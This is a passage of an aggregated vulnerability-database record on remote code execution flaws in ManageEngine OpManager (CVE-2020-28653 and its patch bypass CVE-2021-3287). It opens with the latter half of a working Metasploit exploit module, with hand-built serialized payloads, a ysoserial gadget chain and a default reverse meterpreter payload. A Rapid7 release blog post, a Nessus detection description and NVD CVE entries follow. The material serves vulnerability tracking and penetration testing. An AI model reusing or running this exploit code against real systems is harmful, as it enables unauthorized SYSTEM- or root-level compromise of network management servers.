ARCH_PYTHON,\n 'Platform' => 'python',\n 'Type' => :python,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'python/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultOptions' => {\n 'RPORT' => 8060\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-07-26',\n 'Notes' => {\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK ],\n 'Stability' => [ CRASH_SAFE ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'OpManager path', '/']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'Automatic', [ 'Automatic', 'CVE-2020-28653', 'CVE-2021-3287' ] ])\n ])\n end\n\n def check\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'data' => build_java_serialized_int(1002)\n })\n return Exploit::CheckCode::Unknown unless res\n # the patched version will respond back with 200 OK and no data in the response body\n return Exploit::CheckCode::Safe unless res.code == 200 && res.body.start_with?(\"\\xac\\xed\\x00\\x05\".b)\n\n Exploit::CheckCode::Detected\n end\n\n def exploit\n # Step 1: Establish a valid HTTP session\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path),\n 'keep_cookies' => true\n })\n unless res&.code == 200 && res.get_cookies =~ /JSESSIONID=/\n fail_with(Failure::UnexpectedReply, 'Failed to establish an HTTP session')\n end\n print_status('An HTTP session cookie has been issued')\n if (@vulnerability = datastore['CVE']) == 'Automatic'\n # if selecting the vulnerability automatically, use version detection\n if (version = res.body[%r{(?<=cachestart/)(\\d{6})(?=/cacheend)}]&.to_i).nil?\n fail_with(Failure::UnexpectedReply, 'Could not identify the remote version number')\n end\n\n version = Rex::Version.new(\"#{version / 10000}.#{(version % 10000) / 1000}.#{version % 1000}\")\n print_status(\"Detected version: #{version}\")\n if version < Rex::Version.new('12.1')\n fail_with(Failure::NotVulnerable, 'Versions < 12.1 are not affected by the vulnerability')\n elsif version < Rex::Version.new('12.5.233')\n @vulnerability = 'CVE-2020-28653'\n elsif version < Rex::Version.new('12.5.329')\n @vulnerability = 'CVE-2021-3287'\n else\n fail_with(Failure::NotVulnerable, 'Versions > 12.5.328 are not affected by this vulnerability')\n end\n end\n\n # Step 2: Add the requestHandler to the HTTP session\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMHandShakeServlet'),\n 'keep_cookies' => true,\n 'data' => build_java_serialized_int(1002)\n })\n unless res&.code == 200\n fail_with(Failure::UnexpectedReply, 'Failed to setup the HTTP session')\n end\n print_status('The request handler has been associated with the HTTP session')\n\n if @vulnerability == 'CVE-2021-3287'\n # need to send an OPEN_SESSION request to the SUM PDU handler so the SUMServerIOAndDataAnalyzer object is\n # initialized and made ready to process subsequent requests\n send_sumpdu(build_sumpdu(data: build_java_serialized_int(0)))\n end\n\n # Step 3: Exploit the deserialization vulnerability to run commands\n case target['Type']\n when :nix_dropper\n execute_cmdstager\n when :win_dropper\n execute_cmdstager\n when :win_psh\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n else\n execute_command(payload.encoded)\n end\n end\n\n def build_java_serialized_int(int)\n stream = Serialization::Model::Stream.new\n stream.contents << Serialization::Model::BlockData.new(stream, [ int ].pack('N'))\n stream.encode\n end\n\n def build_sumpdu(data: '')\n # build a serialized SUMPDU object with a custom data block\n sumpdu = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x27\\x63\\x6f\\x6d\\x2e\\x61\\x64\\x76\\x65\".b\n sumpdu << \"\\x6e\\x74\\x6e\\x65\\x74\\x2e\\x74\\x6f\\x6f\\x6c\\x73\\x2e\\x73\\x75\\x6d\\x2e\".b\n sumpdu << \"\\x70\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x2e\\x53\\x55\\x4d\\x50\\x44\\x55\\x24\".b\n sumpdu << \"\\x29\\xfc\\x8a\\x86\\x1b\\xfd\\xed\\x03\\x00\\x03\\x5b\\x00\\x04\\x64\\x61\\x74\".b\n sumpdu << \"\\x61\\x74\\x00\\x02\\x5b\\x42\\x4c\\x00\\x02\\x69\\x64\\x74\\x00\\x12\\x4c\\x6a\".b\n sumpdu << \"\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\".b\n sumpdu << \"\\x4c\\x00\\x08\\x75\\x6e\\x69\\x71\\x75\\x65\\x49\\x44\\x71\\x00\\x7e\\x00\\x02\".b\n sumpdu << \"\\x78\\x70\\x7a\" + [ 0x14 + data.length ].pack('N')\n sumpdu << \"\\x00\\x0c\\x4f\\x50\\x45\\x4e\\x5f\\x53\\x45\\x53\\x53\\x49\\x4f\\x4e\\x00\\x00\".b\n sumpdu << \"\\x00\\x00\"\n sumpdu << [ data.length ].pack('n') + data\n sumpdu << \"\\x78\".b\n sumpdu\n end\n\n def send_sumpdu(sumpdu)\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/servlets/com.adventnet.tools.sum.transport.SUMCommunicationServlet'),\n 'keep_cookies' => true,\n 'data' => [ sumpdu.length ].pack('N') + sumpdu\n })\n res\n end\n\n def execute_command(cmd, _opts = {})\n # An executable needs to be prefixed to the command to make it compatible with the way in which the gadget chain\n # will execute it.\n case target['Platform']\n when 'python'\n cmd.prepend('python -c ')\n when 'win'\n cmd.prepend('cmd.exe /c ')\n else\n cmd.gsub!(/\\s+/, '${IFS}')\n cmd.prepend('sh -c ')\n end\n\n vprint_status(\"Executing command: #{cmd}\")\n # the frohoff/ysoserial#168 gadget chain is a derivative of CommonsBeanutils1 that has been updated to remove the\n # dependency on the commons-collections library making it usable in this context\n java_payload = Msf::Util::JavaDeserialization.ysoserial_payload('frohoff/ysoserial#168', cmd)\n\n if @vulnerability == 'CVE-2020-28653'\n # in this version, the SUM PDU that is deserialized is the malicious object\n sum_pdu = java_payload\n elsif @vulnerability == 'CVE-2021-3287'\n # the patch bypass exploits a flaw in the ITOMObjectInputStream where it can be put into a state that allows\n # arbitrary objects to be deserialized by first sending an object of the expected type\n pdu_data = build_java_serialized_int(2) # 2 is some kind of control code necessary to execute the desired code path\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING\n pdu_data << JAVA_SERIALIZED_STRING_ARRAY\n pdu_data << Serialization::TC_RESET\n pdu_data << java_payload.delete_prefix(\"\\xac\\xed\\x00\\x05\".b)\n sum_pdu = build_sumpdu(data: pdu_data)\n end\n\n res = send_sumpdu(sum_pdu)\n fail_with(Failure::UnexpectedReply, 'Failed to execute the command') unless res&.code == 200\n end\nend\n", "sourceHref": "https://0day.today/exploit/36780", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2021-09-24T21:21:53", "description": "## Vulnerability is in the eye of the beholder\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/09/metasploit-blg-3-copy.png)\n\nExploiting firmware authored by [UDP Technology](<https://vcatechnology.com/udp-technology/>) and provided to multiple large OEMs (including Geutebruck), community contributor [TrGFxX](<https://github.com/TrGFxX>) has authored a [neat module](<https://github.com/rapid7/metasploit-framework/pull/15604>) that allows RCE as root on machines running the web interface of the Geutebruck G-Cam and G-Code products. For more information on the vulnerability check out the [CISA advisory](<https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03>).\n\n## OpManager exploit is OP plz nerf\n\nOur very own [zeroSteiner](<https://github.com/zeroSteiner>) authored a [module](<https://github.com/rapid7/metasploit-framework/pull/15670>) implementing both an [exploit](<https://attackerkb.com/topics/uFkcCFlzIW/cve-2020-28653?referrer=blog>) and [patch bypass](<https://attackerkb.com/topics/VnQHtC1Y1N/cve-2021-3287?referrer=blog>) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. This module allows payload execution as either `NT AUTHORITY\\SYSTEM` on Windows or root on Linux. On top of this new module, [zeroSteiner](<https://github.com/zeroSteiner>) made improvements to help utilize the increasingly essential [YSoSerial tool](<https://github.com/frohoff/ysoserial>). You should definitely check it out if you're interested in exploring other Java deserialization vulns.\n\n## Putting the Win in WinRM\n\nIn a big win for Metasploit, community contributor [smashery](<https://github.com/smashery>) finished off their month-long effort to get [fully functional shells working across WinRM!](<https://github.com/rapid7/metasploit-framework/pull/15632>) These new sessions support post modules, NTLMSSP authentication, and are also able to run without a payload in remote memory, making these sessions pretty hard to detect. This is a major improvement over the previous WinRM implementation that only supported execution of a single command, so huge thanks again to [smashery](<https://github.com/smashery>).\n\n## You can tell a lot about a protocol from its handshake\n\nIn one final noteworthy addition, [smashery](<https://github.com/smashery>) has once again come through with a [PR](<https://github.com/rapid7/metasploit-framework/pull/15696>) that significantly improves our RDP library. Metasploit users can now capture the NETBIOS computer name, NETBIOS domain name, DNS computer name, DNS domain name, and OS version from the NTLM handshake carried out over RDP, and our rdp_scanner module has been updated to display this info to all the RDP sniffers out there.\n\n## New module content (3)\n\n * [Direct windows syscall evasion technique](<https://github.com/rapid7/metasploit-framework/pull/15506>) by [Yaz](<https://github.com/kensh1ro>) \\- This adds a new evasion module that uses direct syscalls on 64-bit versions of Windows to evade detection.\n * [Geutebruck instantrec Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/15604>) by [Ibrahim Ayadhi - RandoriSec](<https://twitter.com/ayadhiibrahim?lang=en>) and [Titouan Lazard](<https://twitter.com/titouanlazard?lang=en>) \\- RandoriSec, which exploits [CVE-2021-33549](<https://attackerkb.com/topics/kCZ3M8XTgH/cve-2021-33549?referrer=blog>) \\- This module exploits an unauthenticated buffer overflow vulnerability within the `action` parameter of the `/uapi-cgi/instantrec.cgi` endpoint in various Geutebruck G-Cam and G-Code devices. The exploit results in code execution as the `root` user on target devices.\n * [ManageEngine OpManager SumPDU Java Deserialization](<https://github.com/rapid7/metasploit-framework/pull/15670>) by [Johannes Moritz](<https://www.radicallyopensecurity.com/our-team/pentester/JohannesMoritz.html>), [Robin Peraglie](<https://www.linkedin.com/in/robin-peraglie-aa4433161/?originalSubdomain=de>), and [Spencer McIntyre](<https://github.com/zeroSteiner>), which exploits [CVE-2021-3287](<https://attackerkb.com/topics/VnQHtC1Y1N/cve-2021-3287?referrer=blog>) \\- The `exploit/multi/http/opmanager_sumpdu_deserialization` module implements an exploit (CVE-2020-28653) and patch bypass (CVE-2021-3287) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine's OpManager software. Arbitrary code execution as the `NT AUTHORITY\\SYSTEM` user on Windows or the `root` user on Linux is achieved by sending a PDU to the SmartUpdateManager handler.\n\n## Enhancements and features\n\n * [#15684](<https://github.com/rapid7/metasploit-framework/pull/15684>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This improves interactive shell performance for pasted user input.\n * [#15696](<https://github.com/rapid7/metasploit-framework/pull/15696>) from [smashery](<https://github.com/smashery>) \\- This updates the RDP scanner module to extract and show additional information gathered from the NTLM handshake used for Network Level Authentication (NLA).\n * [#15632](<https://github.com/rapid7/metasploit-framework/pull/15632>) from [smashery](<https://github.com/smashery>) \\- This improves Metasploit's WinRM capabilities by allowing shell sessions to be established over the protocol. The shell sessions are interactive and are usable with post modules.\n\n## Bugs fixed\n\n * [#15600](<https://github.com/rapid7/metasploit-framework/pull/15600>) from [agalway-r7](<https://github.com/agalway-r7>) \\- This fixes an issue with encrypted payloads during session setup. The logic that gathers session info is now located in the bootstrap method, which ensures that this functionality is always carried out before any commands are sent.\n * [#15666](<https://github.com/rapid7/metasploit-framework/pull/15666>) from [timwr](<https://github.com/timwr>) \\- This fixes an issue found in Meterpreter's `download` functionality where downloading a file with a name containing unicode characters would fail due to incompatible encoding.\n * [#15679](<https://github.com/rapid7/metasploit-framework/pull/15679>) from [nvn1729](<https://github.com/nvn1729>) \\- This fixes a bug where the tomcat_mgr_upload module was not correctly undeploying the app after exploitation occurred.\n * [#15686](<https://github.com/rapid7/metasploit-framework/pull/15686>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- This fixes a crash in `msfrpc` that occurs due to the `exploit/linux/misc/saltstack_salt_unauth_rce` module's `MINIONS` option default being a regex instead of a string.\n * [#15695](<https://github.com/rapid7/metasploit-framework/pull/15695>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This fixes a crash in the `exploit/unix/local/setuid_nmap` module and adds logging to print the result of the exploit's last command so the user knows what happened in the event of a failure.\n * [#15697](<https://github.com/rapid7/metasploit-framework/pull/15697>) from [smashery](<https://github.com/smashery>) \\- This updates the HTTP NTLM information enumeration module to use the `Net::NTLM` library for consistent data processing without a custom parser.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.1.6...6.1.7](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-09-15T14%3A13%3A18-05%3A00..2021-09-23T09%3A41%3A25-05%3A00%22>)\n * [Full diff 6.1.6...6.1.7](<https://github.com/rapid7/metasploit-framework/compare/6.1.6...6.1.7>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T20:05:51", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28653", "CVE-2021-3287", "CVE-2021-33549"], "modified": "2021-09-24T20:05:51", "id": "RAPID7BLOG:E8FC7BBDB9A9C360054240EFAF9BA636", "href": "https://blog.rapid7.com/2021/09/24/metasploit-wrap-up-131/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2022-06-29T14:50:16", "description": "The OpManager running on the remote host is affected by an unauthenticated remote code execution vulnerability in the Smart Update Manager (SUM) servlet.\n\nThis plugin attempts to detect the issue by sending a serialized Java object to OpManager and looking for a TCP connection initiated from the remote host to the Nessus scanner. In some environments, the TCP SYN packet may not reach the scanner due to network controls. In this case, the plugin may not detect the issue.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-04-02T00:00:00", "type": "nessus", "title": "ManageEngine OpManager Smart Update Manager RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-28653"], "modified": "2022-06-28T00:00:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager"], "id": "MANAGEENGINE_OPMANAGER_CVE-2020-28653.NBIN", "href": "https://www.tenable.com/plugins/nessus/148307", "sourceData": "Binary data manageengine_opmanager_cve-2020-28653.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-04-18T16:31:51", "description": "Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-03T16:15:00", "type": "cve", "title": "CVE-2020-28653", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28653"], "modified": "2022-04-18T15:23:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:12.5"], "id": "CVE-2020-28653", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-28653", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125195:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125158:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125193:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125137:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125161:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125212:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125139:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125180:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125181:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125177:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125229:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125156:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125196:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125197:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125163:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125175:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125178:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125159:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125230:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125192:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125231:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125198:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125157:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125232:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125174:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125213:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125228:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125194:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125124:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125176:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125116:*:*:*:*:*:*"]}, {"lastseen": "2022-04-18T20:51:25", "description": "Zoho ManageEngine OpManager before 12.5.329 allows unauthenticated Remote Code Execution due to a general bypass in the deserialization class.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-22T13:15:00", "type": "cve", "title": "CVE-2021-3287", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3287"], "modified": "2022-04-18T18:13:00", "cpe": ["cpe:/a:zohocorp:manageengine_opmanager:12.5"], "id": "CVE-2021-3287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3287", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125193:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125159:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125233:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125196:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125230:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125174:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125180:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125328:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125214:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125156:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125161:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125323:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125163:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125232:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125178:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125157:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125181:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125192:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125194:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125198:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125143:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125137:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125140:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125145:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125158:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125177:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125176:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_opmanager:12.5:build125231:*:*:*:*:*:*", 